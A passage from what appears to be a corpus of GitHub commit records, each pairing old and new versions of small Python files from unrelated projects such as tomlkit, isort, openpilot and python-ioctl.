def make_certificate(csr, ca_key, ca_cert, serial, not_before, not_after, digest='sha512', version=2, exts=()):
"""Make a certificate."""
crt = crypto.X509()
crt.set_serial_number(serial)
crt.gmtime_adj_notBefore(not_before)
crt.gmtime_adj_notAfter(not_after)
crt.set_issuer(ca_cert.get_subject())
crt.set_subject(csr.get_subject())
crt.set_pubkey(csr.get_pubkey())
crt.set_version(version)
crt.add_extensions(exts)
crt.sign(ca_key, digest)
return crt
def make_certificate_authority(**name):
"""Make a certificate authority.
A certificate authority can sign certificates. For clients to be able to
validate certificates signed by your certificate authorithy, they must trust
the certificate returned by this function.
"""
key = make_pkey()
csr = make_certificate_signing_request(key, **name)
crt = make_certificate(csr, key, csr, make_serial(), 0, 10 * 365 * 24 * 60 * 60, exts=[crypto.X509Extension(b'basicConstraints', True, b'CA:TRUE')])
return key, crt
| apache-2.0 | Python |
e05a4f17fcf0ec1bedcc8188d584d31616c4e0af | Update test_toml_file.py | sdispater/tomlkit | tests/test_toml_file.py | tests/test_toml_file.py | import os
from tomlkit.toml_document import TOMLDocument
from tomlkit.toml_file import TOMLFile
def test_toml_file(example):
original_content = example("example")
toml_file = os.path.join(os.path.dirname(__file__), "examples", "example.toml")
toml = TOMLFile(toml_file)
content = toml.read()
assert isinstance(content, TOMLDocument)
assert content["owner"]["organization"] == "GitHub"
toml.write(content)
try:
with open(toml_file, encoding="utf-8") as f:
assert original_content == f.read()
finally:
with open(toml_file, "w", encoding="utf-8", newline="") as f:
assert f.write(original_content)
def test_keep_old_eol(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\r\nb = 2\r\n")
f = TOMLFile(toml_path)
content = f.read()
content["b"] = 3
f.write(content)
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\r\nb = 3\r\n"
def test_keep_old_eol_2(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\nb = 2\n")
f = TOMLFile(toml_path)
content = f.read()
content["b"] = 3
f.write(content)
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\nb = 3\n"
def test_mixed_eol(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\r\nrb = 2\n")
f = TOMLFile(toml_path)
f.write(f.read())
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\r\nrb = 2\n"
| import os
from tomlkit.toml_document import TOMLDocument
from tomlkit.toml_file import TOMLFile
def test_toml_file(example):
original_content = example("example")
toml_file = os.path.join(os.path.dirname(__file__), "examples", "example.toml")
toml = TOMLFile(toml_file)
content = toml.read()
assert isinstance(content, TOMLDocument)
assert content["owner"]["organization"] == "GitHub"
toml.write(content)
try:
with open(toml_file, encoding="utf-8") as f:
assert original_content == f.read()
finally:
with open(toml_file, "w", encoding="utf-8", newline="") as f:
assert f.write(original_content)
def test_keep_old_eol(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\r\nb = 2\r\n")
f = TOMLFile(toml_path)
content = f.read()
content["b"] = 3
f.write(content)
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\r\nb = 3\r\n"
def test_keep_old_eol_2(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\nb = 2\n")
f = TOMLFile(toml_path)
content = f.read()
content["b"] = 3
f.write(content)
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\nb = 3\n"
def test_mixed_eol(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\r\nrb = 2\n")
f = TOMLFile(toml_path)
f.write(f.read())
with io.open(toml_path, "rb") as f:
assert f.read() == b"a = 1\r\nrb = 2\n"
| mit | Python |
12cc5e752f9aa4700b57e3647c3676aba70bb996 | use valid exception for Python 2.7 | h2non/riprova | tests/whitelist_test.py | tests/whitelist_test.py | # -*- coding: utf-8 -*-
import pytest
from riprova import ErrorWhitelist, NotRetriableError
def test_error_whitelist():
whitelist = ErrorWhitelist()
assert type(ErrorWhitelist.WHITELIST) is set
assert len(whitelist._whitelist) > 4
assert type(whitelist._whitelist) is set
assert whitelist._whitelist is not ErrorWhitelist.WHITELIST
# Test setter
whitelist.errors = (Exception, RuntimeError)
# Test getter
assert whitelist.errors == set([Exception, RuntimeError])
# Test add()
whitelist.add(BaseException, SystemExit)
assert whitelist.errors == set([Exception, RuntimeError,
BaseException, SystemExit])
def test_error_whitelist_invalid():
whitelist = ErrorWhitelist()
with pytest.raises(TypeError):
whitelist.errors = dict()
with pytest.raises(TypeError):
whitelist.errors = None
with pytest.raises(TypeError):
whitelist.add(None)
with pytest.raises(TypeError):
whitelist.add(dict())
class NoRetryError(NotRetriableError):
pass
class RetryError(NotRetriableError):
__retry__ = True
@pytest.mark.parametrize("error,expected", [
(SystemExit(), True),
(ImportError(), True),
(ReferenceError(), True),
(SyntaxError(), True),
(KeyboardInterrupt(), True),
(NotRetriableError(), True),
(NoRetryError(), True),
(RetryError(), False),
(ReferenceError(), True),
(Exception(), False),
(RuntimeError(), False),
(TypeError(), False),
(ValueError(), False),
])
def test_error_whitelist_iswhitedlisted(error, expected):
assert ErrorWhitelist().iswhitelisted(error) is expected
| # -*- coding: utf-8 -*-
import pytest

from riprova import ErrorWhitelist, NotRetriableError


def test_error_whitelist():
    whitelist = ErrorWhitelist()

    assert type(ErrorWhitelist.WHITELIST) is set

    assert len(whitelist._whitelist) > 4
    assert type(whitelist._whitelist) is set
    assert whitelist._whitelist is not ErrorWhitelist.WHITELIST

    # Test setter
    whitelist.errors = (Exception, RuntimeError)

    # Test getter
    assert whitelist.errors == set([Exception, RuntimeError])

    # Test add()
    whitelist.add(TimeoutError, SystemExit)
    assert whitelist.errors == set([Exception, RuntimeError,
                                    TimeoutError, SystemExit])


def test_error_whitelist_invalid():
    whitelist = ErrorWhitelist()

    with pytest.raises(TypeError):
        whitelist.errors = dict()

    with pytest.raises(TypeError):
        whitelist.errors = None

    with pytest.raises(TypeError):
        whitelist.add(None)

    with pytest.raises(TypeError):
        whitelist.add(dict())


class NoRetryError(NotRetriableError):
    pass


class RetryError(NotRetriableError):
    __retry__ = True


@pytest.mark.parametrize("error,expected", [
    (SystemExit(), True),
    (ImportError(), True),
    (ReferenceError(), True),
    (SyntaxError(), True),
    (KeyboardInterrupt(), True),
    (NotRetriableError(), True),
    (NoRetryError(), True),
    (RetryError(), False),
    (ReferenceError(), True),
    (Exception(), False),
    (RuntimeError(), False),
    (TypeError(), False),
    (ValueError(), False),
])
def test_error_whitelist_iswhitedlisted(error, expected):
    assert ErrorWhitelist().iswhitelisted(error) is expected
| mit | Python |
f000504c624e3b07a0df4c823a2f422dc1294ed9 | fix test case | icoxfog417/mlimages | testss/test_training.py | testss/test_training.py | import os
from unittest import TestCase
from mlimages.model import ImageProperty
from mlimages.training import TrainingData
import testss.env as env


class TestLabel(TestCase):

    def test_make_mean(self):
        td = self.get_testdata()
        mean_image_file = os.path.join(os.path.dirname(td.label_file.path), "mean_image.png")

        pre_fetch = list(td.label_file.fetch())
        pre_path = td.label_file.path

        td.make_mean_image(mean_image_file)

        self.assertTrue(os.path.isfile(mean_image_file))
        generated = list(td.generate())
        self.assertEqual(len(pre_fetch), len(generated))
        self.assertNotEqual(pre_path, td.label_file.path)

        os.remove(mean_image_file)
        os.remove(td.label_file.path)

    def test_batch(self):
        # prepare
        td = self.get_testdata()
        mean_image_file = os.path.join(os.path.dirname(td.label_file.path), "mean_image.png")
        td.make_mean_image(mean_image_file)

        # make batch data
        td.shuffle()
        count = 0

        for x, y in td.generate_batches(1):
            self.assertEqual((1, 3, 32, 32), x.shape)
            self.assertEqual((1,), y.shape)
            count += 1

        self.assertEqual(env.LABEL_FILE_COUNT, count)

        os.remove(mean_image_file)
        os.remove(td.label_file.path)

    def get_testdata(self):
        p = env.get_label_file_path()
        img_root = os.path.dirname(p)
        prop = ImageProperty(32)
        td = TrainingData(p, img_root=img_root, image_property=prop)
        return td
| import os
from unittest import TestCase
from mlimages.model import LabelFile, ImageProperty
import testss.env as env


class TestLabel(TestCase):

    def test_make_mean(self):
        lf = self.get_label_file()
        mean_image_file = os.path.join(os.path.dirname(lf.path), "mean_image.png")
        imp = ImageProperty(32)

        td = lf.to_training_data(imp)
        td.make_mean_image(mean_image_file)

        self.assertTrue(os.path.isfile(mean_image_file))
        lines = list(lf.fetch())
        generated = list(td.generate())
        self.assertEqual(len(lines), len(generated))
        self.assertNotEqual(lf.path, td.label_file.path)

        os.remove(mean_image_file)
        os.remove(td.label_file.path)

    def test_batch(self):
        lf = self.get_label_file()
        mean_image_file = os.path.join(os.path.dirname(lf.path), "mean_image.png")
        imp = ImageProperty(32)

        # prepare
        td = lf.to_training_data(imp)
        td.make_mean_image(mean_image_file)

        # make batch data
        td.shuffle()
        count = 0

        for x, y in td.generate_batches(1):
            self.assertEqual((1, 3, 32, 32), x.shape)
            self.assertEqual((1,), y.shape)
            count += 1

        self.assertEqual(env.LABEL_FILE_COUNT, count)

        os.remove(mean_image_file)
        os.remove(td.label_file.path)

    def get_label_file(self):
        p = env.get_label_file_path()
        img_root = os.path.dirname(p)
        lf = LabelFile(p, img_root=img_root)
        return lf
| mit | Python |
eadec2e53404407a7f40df483d1f3d75b599a667 | Fix PID location | XENON1T/cax,XENON1T/cax | cax/main.py | cax/main.py | from cax.tasks import checksum, clear, copy
import os
import sys
import logging
import time
from cax.config import password
import daemonocle


def main2():
    password() # Check password specified

    logging.basicConfig(filename='example.log',
                        level=logging.DEBUG,
                        format='%(asctime)s [%(levelname)s] %(message)s')
    logging.info('Daemon is starting')

    tasks = [checksum.AddChecksum(),
             checksum.CompareChecksums(),
             clear.ClearDAQBuffer(),
             copy.SCPPush()]

    while True:
        for task in tasks:
            logging.info("Executing %s." % task.__class__.__name__)
            task.go()

        logging.debug('Sleeping.')
        time.sleep(10)


def main():
    password() # Check password specified

    daemon = daemonocle.Daemon(worker=main,
                               pidfile=os.path.join(os.path.expanduser("~"),
                                                    'cax.pid'))
    daemon.do_action(sys.argv[1])


if __name__ == '__main__':
    main2()
| from cax.tasks import checksum, clear, copy
import os
import sys
import logging
import time
from cax.config import password
import daemonocle


def main2():
    password() # Check password specified

    logging.basicConfig(filename='example.log',
                        level=logging.DEBUG,
                        format='%(asctime)s [%(levelname)s] %(message)s')
    logging.info('Daemon is starting')

    tasks = [checksum.AddChecksum(),
             checksum.CompareChecksums(),
             clear.ClearDAQBuffer(),
             copy.SCPPush()]

    while True:
        for task in tasks:
            logging.info("Executing %s." % task.__class__.__name__)
            task.go()

        logging.debug('Sleeping.')
        time.sleep(10)


def main():
    password() # Check password specified

    daemon = daemonocle.Daemon(worker=main,
                               pidfile='cax.pid')
    daemon.do_action(sys.argv[1])


if __name__ == '__main__':
    main2()
| isc | Python |
61cb2f72d94e8bd771e3130d68f753513e5818d5 | Add lstrip, rstrip, strip methods | msabramo/ansi_str | ansi_str.py | ansi_str.py | import re
_ansi_re = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')


def strip_ansi(value):
    return _ansi_re.sub('', value)


def len_exclude_ansi(value):
    return len(strip_ansi(value))


class ansi_str(str):
    """A str subclass, specialized for strings containing ANSI escapes.

    When you call the ``len`` method, it discounts ANSI color escape codes.
    This is beneficial, because ANSI color escape codes won't mess up code
    that tries to do alignment, padding, printing in columns, etc.
    """

    _stripped = None

    @property
    def stripped(self):
        if self._stripped is None:
            self._stripped = strip_ansi(self[:])
        return self._stripped

    def __len__(self, exclude_ansi=True):
        if exclude_ansi is False:
            return len(self[:])
        return len(self.stripped)

    def ljust(self, width):
        return self.stripped.ljust(width).replace(self.stripped, self)

    def rjust(self, width):
        return self.stripped.rjust(width).replace(self.stripped, self)

    def center(self, width):
        return self.stripped.center(width).replace(self.stripped, self)

    def lstrip(self):
        return ansi_str(super(ansi_str, self).lstrip())

    def rstrip(self):
        return ansi_str(super(ansi_str, self).rstrip())

    def strip(self):
        return ansi_str(super(ansi_str, self).strip())


if __name__ == '__main__':
    # s = ansi_str('abc')
    # print s
    # print len(s)
    s = ansi_str(u'\x1b[32m\x1b[1mSUCCESS\x1b[0m')
    print s
    print len(s)
    print s.__len__()
    print s.__len__(exclude_ansi=False)
    print(len_exclude_ansi(u'\x1b[32m\x1b[1mSUCCESS\x1b[0m'))
| import re

_ansi_re = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')


def strip_ansi(value):
    return _ansi_re.sub('', value)


def len_exclude_ansi(value):
    return len(strip_ansi(value))


class ansi_str(str):
    """A str subclass, specialized for strings containing ANSI escapes.

    When you call the ``len`` method, it discounts ANSI color escape codes.
    This is beneficial, because ANSI color escape codes won't mess up code
    that tries to do alignment, padding, printing in columns, etc.
    """

    _stripped = None

    @property
    def stripped(self):
        if self._stripped is None:
            self._stripped = strip_ansi(self[:])
        return self._stripped

    def __len__(self, exclude_ansi=True):
        if exclude_ansi is False:
            return len(self[:])
        return len(self.stripped)

    def ljust(self, width):
        return self.stripped.ljust(width).replace(self.stripped, self)

    def rjust(self, width):
        return self.stripped.rjust(width).replace(self.stripped, self)

    def center(self, width):
        return self.stripped.center(width).replace(self.stripped, self)


if __name__ == '__main__':
    # s = ansi_str('abc')
    # print s
    # print len(s)
    s = ansi_str(u'\x1b[32m\x1b[1mSUCCESS\x1b[0m')
    print s
    print len(s)
    print s.__len__()
    print s.__len__(exclude_ansi=False)
    print(len_exclude_ansi(u'\x1b[32m\x1b[1mSUCCESS\x1b[0m'))
| mit | Python |
bc2c1a9d4c060242db1273e9608c629b2e0243cc | Fix _version.py | bryanwweber/thermostate | thermostate/_version.py | thermostate/_version.py | """The version of thermohw."""
__version_info__ = (0, 4, 1, 'dev0') # type: Tuple[int, int, int, str]
__version__ = '.'.join([str(v) for v in __version_info__ if str(v)])
| """The version of thermohw."""
from typing import Tuple
__version_info__: Tuple[int, int, int, str] = (0, 4, 1, 'dev0')
__version__ = '.'.join([str(v) for v in __version_info__ if str(v)])
| bsd-3-clause | Python |
01674bb349e9850b26aeae212ad77aa992f18ab5 | bump version | OSSystems/lava-server,OSSystems/lava-server,OSSystems/lava-server,Linaro/lava-server,Linaro/lava-server,Linaro/lava-server,Linaro/lava-server | lava_scheduler_app/__init__.py | lava_scheduler_app/__init__.py | # Copyright (C) 2011 Linaro Limited
#
# Author: Michael Hudson-Doyle <[email protected]>
#
# This file is part of LAVA Scheduler.
#
# LAVA Scheduler is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License version 3 as
# published by the Free Software Foundation
#
# LAVA Scheduler is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with LAVA Scheduler. If not, see <http://www.gnu.org/licenses/>.
__version__ = (0, 4, 0, "final", 0)
| # Copyright (C) 2011 Linaro Limited
#
# Author: Michael Hudson-Doyle <[email protected]>
#
# This file is part of LAVA Scheduler.
#
# LAVA Scheduler is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License version 3 as
# published by the Free Software Foundation
#
# LAVA Scheduler is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with LAVA Scheduler. If not, see <http://www.gnu.org/licenses/>.
__version__ = (0, 3, 0, "final", 0)
| agpl-3.0 | Python |
cb5a8ac1b74cdeeea5901bb22d8600ace8f5b6e1 | Allow parsing lists of dictionaries as well as dictionaries in JSON structures | tcmitchell/geni-ch,tcmitchell/geni-ch | tools/json_extractor.py | tools/json_extractor.py | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Copyright (c) 2013-2016 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
# ----------------------------------------------------------------------
import json
import sys


def main():
    if len(sys.argv) <= 2:
        print "Usage: json_extractor.py field filename"
        sys.exit(0)

    fields = sys.argv[1] # Comma separated
    filename = sys.argv[2]

    data = open(filename).read()
    jdata = json.loads(data)

    field_list = fields.split(',')
    result = jdata
    for field in field_list:
        if type(result) == dict:
            result = result[field]
        elif type(result) == list:
            field_parts = field.split('=')
            field_name = field_parts[0]
            field_value = field_parts[1]
            for entry in result:
                if entry[field_name] == field_value:
                    result = entry
                    break
    print result


if __name__ == "__main__":
    sys.exit(main())
| #!/usr/bin/env python
# ----------------------------------------------------------------------
# Copyright (c) 2013-2016 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
# ----------------------------------------------------------------------
import json
import sys


def main():
    if len(sys.argv) <= 2:
        print "Usage: json_extractor.py field filename"
        sys.exit(0)

    fields = sys.argv[1] # Comma separated
    filename = sys.argv[2]

    data = open(filename).read()
    jdata = json.loads(data)

    field_list = fields.split(',')
    result = jdata
    for field in field_list:
        result = result[field]
    print result


if __name__ == "__main__":
    sys.exit(main())
| mit | Python |
df35ebdcebc8704f964d3301004fcaf88e70336f | fix filereader cd:/ replacement | commaai/openpilot,commaai/openpilot,commaai/openpilot,commaai/openpilot,commaai/openpilot,commaai/openpilot | tools/lib/filereader.py | tools/lib/filereader.py | import os
from tools.lib.url_file import URLFile

DATA_PREFIX = os.getenv("DATA_PREFIX", "http://data-raw.internal/")


def FileReader(fn, debug=False):
  if fn.startswith("cd:/"):
    fn = fn.replace("cd:/", DATA_PREFIX)
  if fn.startswith("http://") or fn.startswith("https://"):
    return URLFile(fn, debug=debug)
  return open(fn, "rb")
| import os
from tools.lib.url_file import URLFile

DATA_PREFIX = os.getenv("DATA_PREFIX", "http://data-raw.internal/")


def FileReader(fn, debug=False):
  if fn.startswith("cd:/"):
    fn.replace("cd:/", DATA_PREFIX)
  if fn.startswith("http://") or fn.startswith("https://"):
    return URLFile(fn, debug=debug)
  return open(fn, "rb")
| mit | Python |
ab78bf2c47a8bec5c1d0c5a7951dba1c98f5c28e | Revert file to moneymanager master branch. | moneymanagerex/general-reports,moneymanagerex/general-reports | check_gm.py | check_gm.py | #!/usr/bin/env python3
# vi:tabstop=4:expandtab:shiftwidth=4:softtabstop=4:autoindent:smarttab

import os, sys
import sqlite3
import urllib.request

err = False

for version in range (7, 14):
    fname = 'tables_v1.sql' if version < 12 else 'tables.sql'
    url = 'https://cdn.jsdelivr.net/gh/moneymanagerex/database@v%i/%s' % (version, fname)
    schema = urllib.request.urlopen(url).read().decode('utf-8')
    db = sqlite3.connect(':memory:')
    db.executescript(schema)

    print('\nTesting reports with MMEX db schema v%i:' % version)
    print('-' * 40)

    for root, dirs, files in os.walk('.'):
        for sql in files:
            if sql=='sqlcontent.sql':
                try: db.executescript(open(os.path.join(root, sql)).read())
                except sqlite3.Error as e:
                    print('ERR', os.path.basename(root).ljust(40), e.args[0])
                    err = True
                else:
                    print('OK ', os.path.basename(root))
                db.rollback()

    db.close()

if err: sys.exit(1)
# vi:tabstop=4:expandtab:shiftwidth=4:softtabstop=4:autoindent:smarttab
import os, sys
import sqlite3
import urllib.request
err = False
for version in range (7, 14):
fname = 'tables_v1.sql' if version < 12 else 'tables.sql'
url = 'https://cdn.jsdelivr.net/gh/moneymanagerex/database@v%i/%s' % (version, fname)
schema = urllib.request.urlopen(url).read().decode('utf-8')
db = sqlite3.connect(':memory:')
db.executescript(schema)
print('\nTesting reports with MMEX db schema v%i:' % version)
print('-' * 40)
for root, dirs, files in os.walk('.'):
for sql in files:
if sql=='sqlcontent.sql':
try: db.executescript(open(os.path.join(root, sql)).read())
except sqlite3.Error as e:
print('ERR', os.path.basename(root).ljust(40), e.args[0])
err = True
else:
print('OK ', os.path.basename(root))
db.rollback()
db.close()
if err: sys.exit(1) | mit | Python |
81bd4c6a7b94803e57a64f47bacbf3d5059282bd | add node | HeyIamJames/CodingInterviewPractice,HeyIamJames/CodingInterviewPractice | checkbst.py | checkbst.py | """
This is a very common interview question.
Given a binary tree, check whether it’s a binary
search tree or not. Simple as that..
http://www.ardendertat.com/2011/10/10/programming-interview-questions-7-binary-search-tree-check/
"""


class Node:
    def __init__(self, val=None):
        self.left, self.right, self.val = None, None, val | """
This is a very common interview question.
Given a binary tree, check whether it’s a binary
search tree or not. Simple as that..
http://www.ardendertat.com/2011/10/10/programming-interview-questions-7-binary-search-tree-check/
"""
| mit | Python |
175bbd2f181d067712d38beeca9df4063654103a | Update script to remove extension from filename | WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln | nlppln/frog_to_saf.py | nlppln/frog_to_saf.py | #!/usr/bin/env python
import click
import os
import codecs
import json

from xtas.tasks._frog import parse_frog, frog_to_saf


@click.command()
@click.argument('input_files', nargs=-1, type=click.Path(exists=True))
@click.argument('output_dir', nargs=1, type=click.Path())
def frog2saf(input_files, output_dir):
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)

    for fi in input_files:
        with codecs.open(fi) as f:
            lines = f.readlines()
        lines = [line.strip() for line in lines]

        saf_data = frog_to_saf(parse_frog(lines))

        head, tail = os.path.split(fi)
        fname = tail.replace(os.path.splitext(tail)[1], '')

        out_file = os.path.join(output_dir, '{}.json'.format(fname))
        with codecs.open(out_file, 'wb', encoding='utf-8') as f:
            json.dump(saf_data, f, indent=4)


if __name__ == '__main__':
    frog2saf()
| #!/usr/bin/env python
import click
import os
import codecs
import json

from xtas.tasks._frog import parse_frog, frog_to_saf


@click.command()
@click.argument('input_files', nargs=-1, type=click.Path(exists=True))
@click.argument('output_dir', nargs=1, type=click.Path())
def frog2saf(input_files, output_dir):
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)

    for fi in input_files:
        with codecs.open(fi) as f:
            lines = f.readlines()
        lines = [line.strip() for line in lines]

        saf_data = frog_to_saf(parse_frog(lines))

        head, tail = os.path.split(fi)

        out_file = os.path.join(output_dir, '{}.json'.format(tail))
        with codecs.open(out_file, 'wb', encoding='utf-8') as f:
            json.dump(saf_data, f, indent=4)


if __name__ == '__main__':
    frog2saf()
| apache-2.0 | Python |
b3426bcd217c336f8807a5474b47dea72a994eb9 | Rename `op`-parameter to `request`. | olavmrk/python-ioctl,olavmrk/python-ioctl | ioctl/__init__.py | ioctl/__init__.py | import ctypes
import fcntl
import sys

# In Python 2, the bytearray()-type does not support the buffer interface,
# and can therefore not be used in ioctl().
# This creates a couple of helper functions for converting to and from
if sys.version_info < (3, 0):
    import array

    def _to_bytearray(value):
        return array.array('B', value)

    def _from_bytearray(value):
        return value.tostring()
else:
    def _to_bytearray(value):
        return bytearray(value)

    def _from_bytearray(value):
        return bytes(value)


def ioctl_int(fd, request, value=0):
    """Call ioctl() with an `int *` argument.

    :param fd: File descriptor to operate on.
    :param request: The ioctl request to call.
    :param value: Optional value to pass to the ioctl() operation. Defaults to 0.
    :return The contents of the value parameter after the call to ioctl().
    """
    res = ctypes.c_int(value)
    fcntl.ioctl(fd, request, res)
    return res.value


def ioctl_size_t(fd, request, value=0):
    """Call ioctl() with a `size_t *` argument.

    :param fd: File descriptor to operate on.
    :param request: ioctl request to call.
    :param value: Optional value to pass to the ioctl() operation. Defaults to 0.
    :return: The contents of the value parameter after the call to ioctl().
    """
    res = ctypes.c_size_t(value)
    fcntl.ioctl(fd, request, res)
    return res.value


def ioctl_buffer(fd, request, value=None, length=None):
    """Call ioctl() with a byte buffer argument.

    You must specify either the `value` parameter or the `length` parameter.
    If the `length` parameter is specified, this function will allocate a byte
    buffer of the specified length to pass to ioctl().

    :param fd: File descriptor to operate on.
    :param request: ioctl request to call.
    :param value: Optional contents of the byte buffer at the start of the call.
    :param length: Optional length of the byte buffer.
    :return: The contents of the value parameter after the call to ioctl().
    """
    request = int(request)

    if value is None and length is None:
        raise ValueError('Must specify either `value` or `length`')
    if value is not None and length is not None:
        raise ValueError('Cannot specify both `value` and `length`')

    if value is None:
        value = [0] * length

    data = _to_bytearray(value)
    fcntl.ioctl(fd, request, data)
    data = _from_bytearray(data)
    return data
| import ctypes
import fcntl
import sys

# In Python 2, the bytearray()-type does not support the buffer interface,
# and can therefore not be used in ioctl().
# This creates a couple of helper functions for converting to and from
if sys.version_info < (3, 0):
    import array

    def _to_bytearray(value):
        return array.array('B', value)

    def _from_bytearray(value):
        return value.tostring()
else:
    def _to_bytearray(value):
        return bytearray(value)

    def _from_bytearray(value):
        return bytes(value)


def ioctl_int(fd, op, value=0):
    """Call ioctl() with an `int *` argument.

    :param fd: File descriptor to operate on.
    :param op: The ioctl request to call.
    :param value: Optional value to pass to the ioctl() operation. Defaults to 0.
    :return The contents of the value parameter after the call to ioctl().
    """
    res = ctypes.c_int(value)
    fcntl.ioctl(fd, op, res)
    return res.value


def ioctl_size_t(fd, op, value=0):
    """Call ioctl() with a `size_t *` argument.

    :param fd: File descriptor to operate on.
    :param op: ioctl request to call.
    :param value: Optional value to pass to the ioctl() operation. Defaults to 0.
    :return: The contents of the value parameter after the call to ioctl().
    """
    res = ctypes.c_size_t(value)
    fcntl.ioctl(fd, op, res)
    return res.value


def ioctl_buffer(fd, op, value=None, length=None):
    """Call ioctl() with a byte buffer argument.

    You must specify either the `value` parameter or the `length` parameter.
    If the `length` parameter is specified, this function will allocate a byte
    buffer of the specified length to pass to ioctl().

    :param fd: File descriptor to operate on.
    :param op: ioctl request to call.
    :param value: Optional contents of the byte buffer at the start of the call.
    :param length: Optional length of the byte buffer.
    :return: The contents of the value parameter after the call to ioctl().
    """
    op = int(op)

    if value is None and length is None:
        raise ValueError('Must specify either `value` or `length`')
    if value is not None and length is not None:
        raise ValueError('Cannot specify both `value` and `length`')

    if value is None:
        value = [0] * length

    data = _to_bytearray(value)
    fcntl.ioctl(fd, op, data)
    data = _from_bytearray(data)
    return data
| mit | Python |
0ac4fe1431fd04aa2645a4afc3d4d2fbfb21bb90 | Update plone profile: copy of black, plus three settings. | PyCQA/isort,PyCQA/isort | isort/profiles.py | isort/profiles.py | """Common profiles are defined here to be easily used within a project using --profile {name}"""
from typing import Any, Dict

black = {
    "multi_line_output": 3,
    "include_trailing_comma": True,
    "force_grid_wrap": 0,
    "use_parentheses": True,
    "ensure_newline_before_comments": True,
    "line_length": 88,
}

django = {
    "combine_as_imports": True,
    "include_trailing_comma": True,
    "multi_line_output": 5,
    "line_length": 79,
}

pycharm = {
    "multi_line_output": 3,
    "force_grid_wrap": 2,
    "lines_after_imports": 2,
}

google = {
    "force_single_line": True,
    "force_sort_within_sections": True,
    "lexicographical": True,
    "single_line_exclusions": ("typing",),
    "order_by_type": False,
    "group_by_package": True,
}

open_stack = {
    "force_single_line": True,
    "force_sort_within_sections": True,
    "lexicographical": True,
}

plone = black.copy()
plone.update(
    {
        "force_alphabetical_sort": True,
        "force_single_line": True,
        "lines_after_imports": 2,
    }
)

attrs = {
    "atomic": True,
    "force_grid_wrap": 0,
    "include_trailing_comma": True,
    "lines_after_imports": 2,
    "lines_between_types": 1,
    "multi_line_output": 3,
    "use_parentheses": True,
}

hug = {
    "multi_line_output": 3,
    "include_trailing_comma": True,
    "force_grid_wrap": 0,
    "use_parentheses": True,
    "line_length": 100,
}

wemake = {
    "multi_line_output": 3,
    "include_trailing_comma": True,
    "use_parentheses": True,
    "line_length": 80,
}

appnexus = {
    **black,
    "force_sort_within_sections": True,
    "order_by_type": False,
    "case_sensitive": False,
    "reverse_relative": True,
    "sort_relative_in_force_sorted_sections": True,
    "sections": ["FUTURE", "STDLIB", "THIRDPARTY", "FIRSTPARTY", "APPLICATION", "LOCALFOLDER"],
    "no_lines_before": "LOCALFOLDER",
}

profiles: Dict[str, Dict[str, Any]] = {
    "black": black,
    "django": django,
    "pycharm": pycharm,
    "google": google,
